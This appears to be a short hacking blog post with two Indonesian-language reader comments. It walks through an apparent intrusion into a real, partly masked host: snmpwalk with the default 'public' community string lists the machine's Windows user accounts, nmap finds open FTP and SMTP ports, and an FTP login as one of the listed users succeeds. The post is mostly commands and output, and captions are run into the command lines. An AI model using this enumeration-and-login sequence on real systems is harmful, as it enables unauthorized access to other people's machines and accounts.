This is a simple scenario that would reveal :), Some machine has unconfigure snmp, so a bad guy can "walking" on his snmp request with OID to obtain the list of lanman users .. tadda
devil@venom ~ $ sudo snmpwalk -v 1 -c public 202.x.155.x OIDGOt username? try some remote connection services,
STRING: "Guest"
STRING: "ASPNET"
STRING: "angely"
STRING: "SQLDebugger"
STRING: "Administrator"
STRING: "TsInternetUser"
STRING: "IUSR_SCC-ZR574A805WI"
STRING: "IWAM_SCC-ZR574A805WI"
devil@venom ~ $ nmap -vv 202.x.155.x -p 20-25 | grep openMost way, uname/passwd.. and tadda
Discovered open port 21/tcp on 202.x.155.x
Discovered open port 25/tcp on 202.x.155.x
21/tcp open ftp
25/tcp open smtp
devil@venom ~ $
devil@venom ~ $ ftpKids, (only)just try this at home. ?Yeah, well it just on another daily boring "working" days,
ftp> o 202.x.155.x
Connected to 202.x.155.x(202.x.155.x).
220 ANGSRV Microsoft FTP Service (Version 5.0).
Name (202.x.155.x:devil): angely
500 'AUTH SSL': command not understood
SSL not available
331 Password required for angely.
Password:
230 User angely logged in.
Remote system type is Windows.
ftp> bye
221
new technique? not really... just lucky
images are property of http://www.sdm-net.org
snmpwalknya kenapa perlu sudo?
ReplyDelete*jangan ketawa ya om, "cuma karena kebiasaaan aja :))" (dari ubuntu sampe gentoo)
ReplyDelete